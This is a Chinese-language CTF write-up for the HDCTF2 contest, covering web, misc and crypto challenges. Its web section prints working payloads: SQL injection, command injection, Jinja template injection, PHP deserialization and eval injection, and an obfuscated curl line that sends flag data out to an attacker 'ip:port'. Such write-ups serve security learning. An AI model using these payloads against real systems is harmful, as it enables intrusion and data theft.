前段时间创建了海南大学举报的hdctf2。以校外的身份参加,最后获得了举办方提供的小礼品,非常感谢
web
by Firebasky
signin
查看源代码,base64解密
babysql
https://bbs.ichunqiu.com/thread-44483-1-1.html
查看字段
payload:1'order by 3%23
获得flag:1'union select 1,2,flag from flag%23
babyrce
payload:127.0.0.1|cat /flag
easy_git
https://www.cnblogs.com/Lmg66/p/13598803.html
使用GitHack 工具
python GitHack.py -u 8.129.15.153:20003/.git/
HDCTF{ACTF_.git_leak_is_dangerous}
注:可能一次不成功,可以多尝试几次
backup_file
/index.php.bak下载备份文件
弱类型比较
?key=123
easy_file_include
php://filter/read=convert.base64-encode/resource=flag.php
do_u_know_HTTP
根据提示进行添加
添加参数是
Mg:
erciyuan
这道题一点点坑,思路是进行文件包含,读取文件,必须知道加密格式,结果加密格式在返回包里面
Hint: !HDCTF!.php && bin2hex(base64_encode(gzdeflate($file)))
第二个坑是将!换成了HnuSec
,读取源代码发现的
<?php
$a='HnuSecHDCTFHnuSec.php';
echo (bin2hex(base64_encode(gzdeflate($a))));
#383867724455354e396e4278446e487a41445031436a494b41413d3d
获得flag
hash_hmac
post:
x[]=1&y[]=2
welcome
登录成功就OK
用户名:admin
密码直接给你了
calculator_v1
因为没有对参数进行过滤可以执行命令
open("flag").read()
__import__('os').popen('cat flag').read()
ezflask
https://www.cnblogs.com/bmjoker/p/13508538.html
https://blog.csdn.net/a3320315/article/details/104102979?utm_source=app
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("cat flag").read()') }} {% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}
dudaima
https://zhuanlan.zhihu.com/p/102166928?utm_source=qq
<?php
show_source(__FILE__);
error_reporting(0);
include "lib.php";
class Just4Fun {
public $enter;
public $secret;
}
if(isset($_GET["pass"])) {
$o = unserialize($_GET["pass"]);
$o->secret = bin2hex(random_bytes(256));
if ($o->secret === $o->enter){
echo FLAG;
}else{
die("secret or enter wrong!");
}
}else{
die("no pass");
}
#代码非常简单,就是让Just4Fun类里面的属性值相同就获得flag
#但是secret的值我们不知道,但是我们知道他的地址不会改变。
payload:
<?php
error_reporting(0);
class Just4Fun {
public $enter;
public $secret;
}
$a =new Just4Fun();
$a->enter=&$a->secret;//这里的a=&b 即代表将b的指针赋值给a 无论b的值怎么变 a始终等于b
echo serialize($a);
#O:8:"Just4Fun":2:{s:5:"enter";N;s:6:"secret";R:2;}
getshell
<?php
$str = $_POST['str'];
if(isset($str)){
$sp = ",";
$kv = "=";
$arr = str_replace(array($kv,$sp),array('"=>"','","'),'array("'.$str.'")');
eval("\$arr"." = $arr;");
}else{
show_source(__FILE__);
}
通过闭合前面和注释后面绕过
payload:");system('cat flag.php');//
warmup
和wecome一样的
welcome_to_the_new
简单的反序列化
#payload
<?php
error_reporting(0);
Class Stu{
private $name;
private $age;
private $sex;
public $info = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
$someone = new Stu('M&G', 20, 'Man');
echo urlencode(serialize($someone));
calculator_v2
open('flag').__class__.__dict__['re'+'ad'](open('flag'))
simple_trick
https://blog.csdn.net/moliyiran/article/details/81172325
<?php
highlight_file(__FILE__);
include('flag.php');
$a = $_GET['a'];
$b = unserialize ($a);
$b->c = $flag;
foreach($b as $key => $value)
{
if($key==='c')
{
continue;
}
echo $value;
}
?>
#payload
#m3w师傅
<?php
$a=new stdClass();
//借用内置类声明对象
$a->b=&$a->c;
//将c的地址附给b
// print_r($a);
echo serialize($a);
?>
welcome_to_the_new2
在welcome_to_the_new1的基础上添加了php字符串解析漏洞
https://www.freebuf.com/articles/web/213359.html
#payload
<?php
error_reporting(0);
Class Stu{
private $name;
private $age;
private $sex;
public $info = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
$someone = new Stu('M&G', 20, 'Man');
echo urlencode(serialize($someone));
#O%3A3%3A%22Stu%22%3A4%3A%7Bs%3A9%3A%22%00Stu%00name%22%3BN%3Bs%3A8%3A%22%00Stu%00age%22%3BN%3Bs%3A8%3A%22%00Stu%00sex%22%3BN%3Bs%3A4%3A%22info%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D
传递的参数和值是
Hai[nan.University=O%3A3%3A%22Stu%22%3A4%3A%7Bs%3A9%3A%22%00Stu%00name%22%3BN%3Bs%3A8%3A%22%00Stu%00age%22%3BN%3Bs%3A8%3A%22%00Stu%00sex%22%3BN%3Bs%3A4%3A%22info%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D
calculator_v3
#m3w师傅的payload
http://8.129.15.153:20020/?question=exec("__import__('o'%2b's').po"%2b"pen('curl -d `find / -name \"flag*\"|base64 -w 0` ip:端口').re"%2b"ad()")
先用这个payload带回flag的位置
http://8.129.15.153:20020/?question=exec("__import__('o'%2b's').po"%2b"pen('curl -d `cat /usr/src/app/flag|base64 -w 0` ip:端口').re"%2b"ad()")
再用这个带回flag
ezflask
{{"".__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['po'+'pen']("cat fl""ag").read()}}
misc
签到题
直接上flag
一步之遥
zip伪加密,修改最后数据01===》00
你知道lsb是什么意思吗
利用zsteg查看照片,发现存在zip,和flag
zsteg -E "b1,rgb,lsb,xy" 1.png > flag.zip
利用crc暴力破解
girlfriend
通过Wireshark打开,从http分离照片获得flag
嘤语
将嘤换成-去解密
你真的了解dns吗
考察 dns的txt解析
payload:nslookup -qt=txt hdctf.0x00.work
密码
起源
凯撒密码加密
围住世界
相当于栅栏密码的变性,需要自己推
3 6 6 6 3
有趣起来了
考察埃特巴什码